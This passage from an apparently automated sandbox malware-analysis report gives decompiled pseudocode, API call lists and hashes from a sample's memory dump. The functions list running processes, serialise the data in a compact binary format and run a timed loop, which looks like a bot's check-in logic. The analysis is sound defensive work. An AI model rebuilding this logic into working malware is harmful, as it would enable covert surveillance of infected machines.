				if(_t28 <  *0x13ec278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0x13ec280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M013E9044))) {
							case 0:
								 *0x13ec280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0x13ec280 = 0;
								__eax = E013E9620(__ecx, __edx);
								__eax = __eax;
								if(__eax == 0) {
									 *0x13ec280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0x13ec29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0x13ec280 = 0;
								 *0x13ec294 = 0x13e1270;
								 *0x13ec298 = 0x13e1270;
								__eax = E013E22E0();
								__eax =  *0x13ec02c; // 0x13e12f8
								 *0x13ec26c = __eax;
								__eax =  *0x13ec030; // 0x6a
								 *0x13ec268 = 0x13ec2a8;
								 *0x13ec270 = __eax;
								 *0x13ec280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0x13ec280 = 0;
								__eax = E013E8BB0( &_v28);
								__ecx =  &_v36;
								__eax = E013E8D50( &_v36);
								__eax =  *0x13ecbd0; // 0x0
								_push(0x13ec2a8);
								_v32 = __eax;
								_v44 = 0x13ec2a8;
								_v44 =  *0x13ec1e4();
								__eax =  *0x13ec2a4; // 0x0
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = E013E8920( &_v24);
									__ecx =  &_v16;
									__eax = E013EA7A0( &_v16);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(E013E9F80( &_v84,  &_v52) != 0) {
										 &_v92 =  &_v84;
										if(E013E8520( &_v84,  &_v92) == 0) {
											__eax =  *0x13ec298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0x13ec298 = __eax;
											 *0x13ec298 = __eax;
										} else {
											__eax = E013E99A0();
											__ecx = 0;
											__eax = E013E88B0(0);
											__ecx = 0;
											__eax = E013EA750(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(E013EA180( &_v92,  &_v76) != 0) {
												__eax = E013E1750();
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = E013E9A90(_v76, __edx);
												}
												__eax = E013E1750();
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = E013E8990(_v68, __edx);
													__esi = 0;
												}
												__eax = E013E1750();
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = E013EA810(_v60, __edx);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0x13ec280 = 4;
								 *0x13ec278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x013e8dda
0x013e8de6
0x013e903d
0x013e9041
0x013e8dec
0x013e8dec
0x013e8df1
0x013e8df5
0x00000000
0x013e8dfb
0x013e8dfb
0x00000000
0x013e8e02
0x013e8e10
0x00000000
0x00000000
0x013e8e13
0x013e8e1d
0x013e8e22
0x013e8e25
0x013e8e41
0x013e8e4b
0x013e8e4f
0x013e8e27
0x013e8e28
0x00000000
0x013e8e2e
0x013e8e34
0x013e8e3a
0x013e8e3e
0x013e8e3e
0x013e8e28
0x00000000
0x00000000
0x013e8e52
0x013e8e5c
0x013e8e66
0x013e8e70
0x013e8e75
0x013e8e7a
0x013e8e7f
0x013e8e84
0x013e8e8e
0x013e8e93
0x013e8e9d
0x013e8ea1
0x00000000
0x00000000
0x013e8ea4
0x013e8ea8
0x013e8eb2
0x013e8eb7
0x013e8ebb
0x013e8ec0
0x013e8ec5
0x013e8eca
0x013e8ece
0x013e8edc
0x013e8ee0
0x013e8ee8
0x013e8ef0
0x013e8ef0
0x013e8ef4
0x013e8ef9
0x013e8efe
0x013e8f02
0x013e8f07
0x013e8f0b
0x013e8f16
0x013e8f21
0x013e8f30
0x013e8fb1
0x013e8fb6
0x013e8fbb
0x013e8fbe
0x013e8fcd
0x013e8f32
0x013e8f32
0x013e8f37
0x013e8f39
0x013e8f3e
0x013e8f40
0x013e8f45
0x013e8f49
0x013e8f54
0x013e8f56
0x013e8f5b
0x013e8f61
0x013e8f63
0x013e8f67
0x013e8f67
0x013e8f6c
0x013e8f71
0x013e8f77
0x013e8f79
0x013e8f7d
0x013e8f82
0x013e8f82
0x013e8f84
0x013e8f89
0x013e8f8f
0x013e8f91
0x013e8f95
0x013e8f9a
0x013e8f9a
0x013e8f8f
0x013e8fa9
0x013e8fa9
0x013e8fdf
0x013e8fdf
0x013e8ff2
0x013e9005
0x013e900b
0x013e9013
0x013e901d
0x013e901f
0x013e902b
0x013e9037
0x00000000
0x00000000
0x013e8dfb
0x013e8df5
0x00000000

APIs

GetTickCount.KERNEL32 ref: 013E8DDA
SetEvent.KERNEL32 ref: 013E8E34
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,013EC2A8), ref: 013E8ED6
GetProcessHeap.KERNEL32(00000000,?), ref: 013E8FA2
HeapFree.KERNEL32(00000000), ref: 013E8FA9
GetProcessHeap.KERNEL32(00000000,?), ref: 013E8FD8
HeapFree.KERNEL32(00000000), ref: 013E8FDF
GetProcessHeap.KERNEL32(00000000,?), ref: 013E8FEB
HeapFree.KERNEL32(00000000), ref: 013E8FF2
GetProcessHeap.KERNEL32(00000000,?), ref: 013E8FFE
HeapFree.KERNEL32(00000000), ref: 013E9005
GetTickCount.KERNEL32 ref: 013E9013
GetProcessHeap.KERNEL32(00000000,?), ref: 013E9030
HeapFree.KERNEL32(00000000), ref: 013E9037

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$CountTick$Eventlstrlen
String ID:
API String ID: 1747682351-0
Opcode ID: b54b6dd2bb2ef39786f249c8115bbb6228dbedd728763222f1f84ea80eeda4d6
Instruction ID: 1d77d7e6090f68f9543dc5bf7b5d1977e80f8dd0db8b9809c01dd3e90a0fdf41
Opcode Fuzzy Hash: b54b6dd2bb2ef39786f249c8115bbb6228dbedd728763222f1f84ea80eeda4d6
Instruction Fuzzy Hash: B0517D729043119FEB70EFA8E84DB5E7BF9BB54309F041519F6598A2C8DB31D904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013E8BB0, Relevance: 21.2, APIs: 14, Instructions: 154
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E013E8BB0(char** __ecx) {
				short* _v8;
				long _v12;
				char** _v16;
				int* _v20;
				short _v540;
				char** _t39;
				short* _t49;
				int* _t61;
				int _t71;
				int _t73;
				signed int _t74;
				short* _t75;
				intOrPtr* _t80;
				long _t82;
				int _t83;
				char** _t84;
				WCHAR* _t86;
				char* _t87;

				_v12 = 0;
				_t73 = 0;
				_v16 = __ecx;
				 *__ecx = 0;
				_t39 =  &(__ecx[1]);
				_v20 = _t39;
				_v8 = 0;
				 *_t39 = 0;
				GetModuleFileNameW(0,  &_v540, 0x104);
				_t86 =  &(( &_v540)[lstrlenW( &_v540)]);
				if(_t86 >  &_v540) {
					while( *_t86 != 0x5c) {
						_t86 = _t86 - 2;
						if(_t86 >  &_v540) {
							continue;
						} else {
						}
						goto L6;
					}
					_t86 =  &(_t86[1]);
				}
				L6:
				E013E2110( &_v12);
				_t80 = _v12;
				if(_t80 != 0) {
					_t75 = 0;
					do {
						_t14 = _t80 + 4; // 0x4
						_t71 = lstrlenW(_t14);
						_t80 =  *_t80;
						_t75 = _t75 + 1 + _t71;
					} while (_t80 != 0);
					_v8 = _t75;
					_t73 = 0;
				}
				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, _v8 + _v8);
				_v8 = _t49;
				if(_t49 == 0) {
					return 0 |  *_v16 != 0x00000000;
				} else {
					_t82 = _v12;
					while(_t82 != 0) {
						_t19 = _t82 + 4; // 0x4
						if(lstrcmpiW(_t19, _t86) == 0) {
							_t49 = _v8;
						} else {
							_t20 = _t82 + 4; // 0x4
							lstrcpyW( &(_v8[_t73]), _t20);
							_t24 = _t82 + 4; // 0x4
							_t74 = _t73 + lstrlenW(_t24);
							_t49 = _v8;
							_t49[_t74] = 0x2c;
							_t73 = _t74 + 1;
						}
						_t82 =  *_t82;
					}
					_t87 = 0;
					_t83 = WideCharToMultiByte(0xfde9, 0, _t49, _t73, 0, 0, 0, 0);
					if(_t83 != 0) {
						_t87 = RtlAllocateHeap(GetProcessHeap(), 8, _t83);
						if(_t87 != 0) {
							WideCharToMultiByte(0xfde9, 0, _v8, _t73, _t87, _t83, 0, 0);
							_t61 = _v20;
							if(_t61 != 0) {
								 *_t61 = _t83;
							}
						}
					}
					_t84 = _v16;
					 *_t84 = _t87;
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0 |  *_t84 != 0x00000000;
				}
			}

0x013e8bbc
0x013e8bc3
0x013e8bc5
0x013e8bca
0x013e8bcc
0x013e8bcf
0x013e8bd7
0x013e8bde
0x013e8be8
0x013e8c01
0x013e8c0c
0x013e8c10
0x013e8c16
0x013e8c21
0x00000000
0x00000000
0x013e8c23
0x00000000
0x013e8c21
0x013e8c25
0x013e8c25
0x013e8c28
0x013e8c2b
0x013e8c30
0x013e8c35
0x013e8c37
0x013e8c40
0x013e8c40
0x013e8c44
0x013e8c4a
0x013e8c4d
0x013e8c4f
0x013e8c53
0x013e8c56
0x013e8c56
0x013e8c67
0x013e8c6d
0x013e8c72
0x013e8d4a
0x013e8c78
0x013e8c78
0x013e8c7d
0x013e8c80
0x013e8c8d
0x013e8cbb
0x013e8c8f
0x013e8c8f
0x013e8c9a
0x013e8ca0
0x013e8caa
0x013e8cb1
0x013e8cb4
0x013e8cb8
0x013e8cb8
0x013e8cbe
0x013e8cc0
0x013e8cc4
0x013e8cd8
0x013e8cdc
0x013e8cee
0x013e8cf2
0x013e8d06
0x013e8d0c
0x013e8d11
0x013e8d13
0x013e8d13
0x013e8d11
0x013e8cf2
0x013e8d15
0x013e8d1d
0x013e8d26
0x013e8d39
0x013e8d39

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 013E8BE8
lstrlenW.KERNEL32(?), ref: 013E8BF5
lstrlenW.KERNEL32(00000004), ref: 013E8C44
GetProcessHeap.KERNEL32(00000008,00000000), ref: 013E8C60
RtlAllocateHeap.NTDLL(00000000), ref: 013E8C67
lstrcmpiW.KERNEL32(00000004,?), ref: 013E8C85
lstrcpyW.KERNEL32(00000000,00000004), ref: 013E8C9A
lstrlenW.KERNEL32(00000004), ref: 013E8CA4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 013E8CD2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 013E8CE1
RtlAllocateHeap.NTDLL(00000000), ref: 013E8CE8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 013E8D06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E8D1F
HeapFree.KERNEL32(00000000), ref: 013E8D26

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Processlstrlen$AllocateByteCharMultiWide$FileFreeModuleNamelstrcmpilstrcpy
String ID:
API String ID: 2501218360-0
Opcode ID: 60182bb8de1d2e71bd347aebcc448195b58f8787a587478128d801fdd48c8c2c
Instruction ID: ae4e6ff4b2c7cacbd767b3a901e7d454716a8c37c8bdd6a88e5e5753ebe05eb4
Opcode Fuzzy Hash: 60182bb8de1d2e71bd347aebcc448195b58f8787a587478128d801fdd48c8c2c
Instruction Fuzzy Hash: 2A515072941329AFEB309FA9D88CA9EBBFCEF45714F1504A5E905DB280DB30D951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013EA690, Relevance: 15.1, APIs: 10, Instructions: 65
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E013EA690(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, E013EA3A0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0x13ecbd4; // 0x0
					 *_t32 = _t25;
					 *0x13ecbd4 = _t32;
					return _t25;
				}
			}

0x013ea692
0x013ea6a4
0x013ea6aa
0x013ea6ae
0x013ea743
0x013ea6b4
0x013ea6b6
0x013ea6bb
0x013ea6be
0x013ea6be
0x013ea6c1
0x013ea6c7
0x013ea6d1
0x013ea6eb
0x013ea6ef
0x013ea731
0x00000000
0x013ea73b
0x013ea701
0x013ea704
0x013ea70a
0x013ea70f
0x013ea72b
0x00000000
0x013ea72b
0x013ea711
0x013ea716
0x013ea718
0x013ea720
0x013ea720

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,013EA87A,?,000DBBA0,?,?,?,?,?,?,?,013E8F9A), ref: 013EA69D
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 013EA6A4
memcpy.NTDLL(00000010,?,?,?,00000000,013EA87A,?,000DBBA0,?,?,?,?,?,?,?,013E8F9A), ref: 013EA6D1
GetProcessHeap.KERNEL32(00000008,0000000C,?,000DBBA0,?,?,?,?,?,?,?,013E8F9A), ref: 013EA6DE
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 013EA6E5
CreateThread.KERNEL32(00000000,00000000,013EA3A0,00000000,00000000,00000000), ref: 013EA704
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,013E8F9A), ref: 013EA724
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,013E8F9A), ref: 013EA72B
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,013E8F9A), ref: 013EA734
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,013E8F9A), ref: 013EA73B

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree$CreateThreadmemcpy
String ID:
API String ID: 1978610079-0
Opcode ID: 8445e409f8f57765e0ce35494f5e5dda73661fc2f83519d7cfe29a2a7469b932
Instruction ID: 058eaba95a95205329ffe258be5991f0ce3764196f3262d8602e104f4f94b095
Opcode Fuzzy Hash: 8445e409f8f57765e0ce35494f5e5dda73661fc2f83519d7cfe29a2a7469b932
Instruction Fuzzy Hash: B321E775640712AFE7309F69E819B4ABBE8FB48711F109519FA5ACB6C4CB70E450CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013E1C50, Relevance: 10.6, APIs: 7, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E013E1C50(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v524;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t31;
				int _t32;
				void* _t35;
				intOrPtr* _t36;

				_t35 = 0;
				_v12 = 0x200;
				_t36 = __ecx;
				_t31 = __edx;
				_v8 = __edx;
				memset(__ecx, 0, 0x14);
				_push( &_v12);
				_push( &_v524);
				_push(0);
				if( *0x13ec0cc() >= 0) {
					_t32 = MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, 0, 0);
					if(_t32 != 0) {
						_t35 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + _t32);
						if(_t35 != 0) {
							MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, _t35, _t32);
						}
					}
					_t31 = _v8;
				}
				 *_t36 =  *0x13ec244(_t35, 0, 0, 0, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				_t19 =  *_t36;
				if(_t19 == 0) {
					L9:
					return 0;
				} else {
					_t21 =  *0x13ec254(_t19, _t31, _a4, 0, 0, 3, 0, 0);
					 *((intOrPtr*)(_t36 + 4)) = _t21;
					if(_t21 == 0) {
						 *0x13ec234( *_t36);
						goto L9;
					} else {
						 *((intOrPtr*)(_t36 + 0xc)) = 3;
						return 1;
					}
				}
			}

0x013e1c5e
0x013e1c60
0x013e1c67
0x013e1c69
0x013e1c6d
0x013e1c70
0x013e1c7c
0x013e1c83
0x013e1c84
0x013e1c8d
0x013e1ca2
0x013e1ca6
0x013e1cbb
0x013e1cbf
0x013e1cd0
0x013e1cd0
0x013e1cbf
0x013e1cd6
0x013e1cd6
0x013e1ceb
0x013e1cf4
0x013e1cfa
0x013e1cfe
0x013e1d39
0x013e1d3f
0x013e1d00
0x013e1d0f
0x013e1d15
0x013e1d1a
0x013e1d31
0x00000000
0x013e1d1d
0x013e1d1d
0x013e1d2e
0x013e1d2e
0x013e1d1a

APIs

memset.NTDLL ref: 013E1C70
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 013E1C9C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 013E1CAE
RtlAllocateHeap.NTDLL(00000000), ref: 013E1CB5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 013E1CD0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E1CED
HeapFree.KERNEL32(00000000), ref: 013E1CF4

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$ByteCharMultiProcessWide$AllocateFreememset
String ID:
API String ID: 4040929015-0
Opcode ID: b2cad4c68e4a33ff096bc78f5b5025ad47cabab30ad4bd4186486703b7b29fd5
Instruction ID: 96ce92890403c96aab6bd1feeef416da0c85810fdd31554ecfa0aed6dd8c0df6
Opcode Fuzzy Hash: b2cad4c68e4a33ff096bc78f5b5025ad47cabab30ad4bd4186486703b7b29fd5
Instruction Fuzzy Hash: 67314B75640315BBFB309AA99C4DFABBBECEB85B11F100169FA15DA1C0DAB199408B60

Uniqueness

Uniqueness Score: -1.00%

Function 013E9F80, Relevance: 9.2, APIs: 6, Instructions: 199
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E9F80(intOrPtr* __ecx, unsigned int* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				long _t50;
				signed char _t61;
				signed char _t63;
				signed char _t65;
				signed char _t67;
				signed char _t69;
				intOrPtr _t71;
				intOrPtr* _t72;
				int _t73;
				int _t74;
				int _t75;
				intOrPtr _t77;
				signed char _t78;
				signed char _t80;
				signed char _t82;
				signed char _t84;
				signed char _t86;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				int _t93;
				signed char* _t94;
				void* _t95;
				intOrPtr _t96;
				char* _t99;
				signed char* _t100;
				signed char* _t101;
				void* _t102;
				char* _t103;
				signed char* _t104;
				void* _t105;
				char* _t106;
				signed char* _t107;
				void* _t108;
				char* _t109;
				signed char* _t110;

				_t94 = __edx;
				_v16 = __ecx;
				_t96 = 1;
				_v12 = 1;
				_t37 =  *__edx;
				if(_t37 > 0x7f) {
					do {
						_t37 = _t37 >> 7;
						_t96 = _t96 + 1;
					} while (_t37 > 0x7f);
					_v12 = _t96;
				}
				_t4 =  &(_t94[8]); // 0x0
				_t38 =  *_t4;
				_t77 = 1;
				while(_t38 > 0x7f) {
					_t38 = _t38 >> 7;
					_t77 = _t77 + 1;
				}
				_t5 =  &(_t94[0x18]); // 0x0
				_t39 =  *_t5;
				_t89 = 1;
				while(_t39 > 0x7f) {
					_t39 = _t39 >> 7;
					_t89 = _t89 + 1;
				}
				_t6 =  &(_t94[0x20]); // 0x0
				_t40 =  *_t6;
				_t71 = 1;
				while(_t40 > 0x7f) {
					_t40 = _t40 >> 7;
					_t71 = _t71 + 1;
				}
				_t7 =  &(_t94[0x28]); // 0x0
				_t41 =  *_t7;
				_v8 = 1;
				while(_t41 > 0x7f) {
					_v8 = _v8 + 1;
					_t41 = _t41 >> 7;
				}
				_t11 =  &(_t94[0x28]); // 0x0
				_t12 =  &(_t94[0x20]); // 0x0
				_t13 =  &(_t94[0x18]); // 0x0
				_t14 =  &(_t94[8]); // 0x0
				_t72 = _v16;
				_t50 =  *_t11 +  *_t12 +  *_t13 +  *_t14 + _v8 + _t71 + _t89 + _t77 + _v12 + 0xf;
				 *(_t72 + 4) = _t50;
				_t99 = RtlAllocateHeap(GetProcessHeap(), 0, _t50);
				 *_t72 = _t99;
				if(_t99 != 0) {
					 *_t99 = 8;
					_t100 = _t99 + 1;
					_t78 =  *_t94;
					while(_t78 > 0x7f) {
						_t69 = _t78;
						_t78 = _t78 >> 7;
						 *_t100 = _t69 | 0x00000080;
						_t100 =  &(_t100[1]);
					}
					 *_t100 = _t78 & 0x0000007f;
					_t100[1] = 0x12;
					_t101 =  &(_t100[2]);
					_t20 =  &(_t94[8]); // 0x0
					_t73 =  *_t20;
					_t80 = _t73;
					_t21 =  &(_t94[4]); // 0x0
					_t90 =  *_t21;
					if(_t73 > 0x7f) {
						do {
							_t67 = _t80;
							_t80 = _t80 >> 7;
							 *_t101 = _t67 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t80 > 0x7f);
					}
					 *_t101 = _t80 & 0x0000007f;
					_t102 =  &(_t101[1]);
					memcpy(_t102, _t90, _t73);
					_t103 = _t102 + _t73;
					 *_t103 = 0x1d;
					_t22 =  &(_t94[0xc]); // 0x0
					 *(_t103 + 1) =  *_t22;
					 *((char*)(_t103 + 5)) = 0x25;
					_t25 =  &(_t94[0x10]); // 0x0
					 *(_t103 + 6) =  *_t25;
					 *((char*)(_t103 + 0xa)) = 0x2a;
					_t104 = _t103 + 0xb;
					_t28 =  &(_t94[0x18]); // 0x0
					_t74 =  *_t28;
					_t82 = _t74;
					_t29 =  &(_t94[0x14]); // 0x0
					_t91 =  *_t29;
					if(_t74 > 0x7f) {
						do {
							_t65 = _t82;
							_t82 = _t82 >> 7;
							 *_t104 = _t65 | 0x00000080;
							_t104 =  &(_t104[1]);
						} while (_t82 > 0x7f);
					}
					 *_t104 = _t82 & 0x0000007f;
					_t105 =  &(_t104[1]);
					memcpy(_t105, _t91, _t74);
					_t106 = _t105 + _t74;
					 *_t106 = 0x32;
					_t107 = _t106 + 1;
					_t30 =  &(_t94[0x20]); // 0x0
					_t75 =  *_t30;
					_t84 = _t75;
					_t31 =  &(_t94[0x1c]); // 0x0
					_t92 =  *_t31;
					if(_t75 > 0x7f) {
						do {
							_t63 = _t84;
							_t84 = _t84 >> 7;
							 *_t107 = _t63 | 0x00000080;
							_t107 =  &(_t107[1]);
						} while (_t84 > 0x7f);
					}
					 *_t107 = _t84 & 0x0000007f;
					_t108 =  &(_t107[1]);
					memcpy(_t108, _t92, _t75);
					_t109 = _t108 + _t75;
					 *_t109 = 0x3a;
					_t110 = _t109 + 1;
					_t32 =  &(_t94[0x28]); // 0x0
					_t93 =  *_t32;
					_t86 = _t93;
					_t33 =  &(_t94[0x24]); // 0x0
					_t95 =  *_t33;
					if(_t93 > 0x7f) {
						do {
							_t61 = _t86;
							_t86 = _t86 >> 7;
							 *_t110 = _t61 | 0x00000080;
							_t110 =  &(_t110[1]);
						} while (_t86 > 0x7f);
					}
					 *_t110 = _t86 & 0x0000007f;
					memcpy( &(_t110[1]), _t95, _t93);
					_t72 = _v16;
				}
				return 0 |  *_t72 != 0x00000000;
			}

0x013e9f89
0x013e9f8b
0x013e9f8e
0x013e9f93
0x013e9f96
0x013e9f9b
0x013e9fa0
0x013e9fa0
0x013e9fa3
0x013e9fa4
0x013e9fa9
0x013e9fa9
0x013e9fac
0x013e9fac
0x013e9faf
0x013e9fb7
0x013e9fc0
0x013e9fc3
0x013e9fc4
0x013e9fc9
0x013e9fc9
0x013e9fcc
0x013e9fd4
0x013e9fd6
0x013e9fd9
0x013e9fda
0x013e9fdf
0x013e9fdf
0x013e9fe2
0x013e9fea
0x013e9ff0
0x013e9ff3
0x013e9ff4
0x013e9ff9
0x013e9ff9
0x013e9ffc
0x013ea006
0x013ea010
0x013ea013
0x013ea016
0x013ea01b
0x013ea01e
0x013ea021
0x013ea024
0x013ea02f
0x013ea039
0x013ea03e
0x013ea04e
0x013ea050
0x013ea054
0x013ea05a
0x013ea05d
0x013ea05e
0x013ea063
0x013ea065
0x013ea067
0x013ea06c
0x013ea06e
0x013ea06f
0x013ea077
0x013ea079
0x013ea07d
0x013ea080
0x013ea080
0x013ea083
0x013ea085
0x013ea085
0x013ea08b
0x013ea090
0x013ea090
0x013ea092
0x013ea097
0x013ea099
0x013ea09a
0x013ea090
0x013ea0a3
0x013ea0a5
0x013ea0a8
0x013ea0ae
0x013ea0b3
0x013ea0b6
0x013ea0b9
0x013ea0bc
0x013ea0c0
0x013ea0c3
0x013ea0c6
0x013ea0ca
0x013ea0cd
0x013ea0cd
0x013ea0d0
0x013ea0d2
0x013ea0d2
0x013ea0d8
0x013ea0e0
0x013ea0e0
0x013ea0e2
0x013ea0e7
0x013ea0e9
0x013ea0ea
0x013ea0e0
0x013ea0f3
0x013ea0f5
0x013ea0f8
0x013ea0fe
0x013ea103
0x013ea106
0x013ea107
0x013ea107
0x013ea10a
0x013ea10c
0x013ea10c
0x013ea112
0x013ea114
0x013ea114
0x013ea116
0x013ea11b
0x013ea11d
0x013ea11e
0x013ea114
0x013ea127
0x013ea129
0x013ea12c
0x013ea132
0x013ea137
0x013ea13a
0x013ea13b
0x013ea13b
0x013ea13e
0x013ea140
0x013ea140
0x013ea146
0x013ea148
0x013ea148
0x013ea14a
0x013ea14f
0x013ea151
0x013ea152
0x013ea148
0x013ea15b
0x013ea160
0x013ea166
0x013ea169
0x013ea179

APIs

GetProcessHeap.KERNEL32(00000000,00000001,?,000DBBA0), ref: 013EA041
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 013EA048
memcpy.NTDLL(00000000,00000000,00000000,?,000DBBA0), ref: 013EA0A8

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessmemcpy
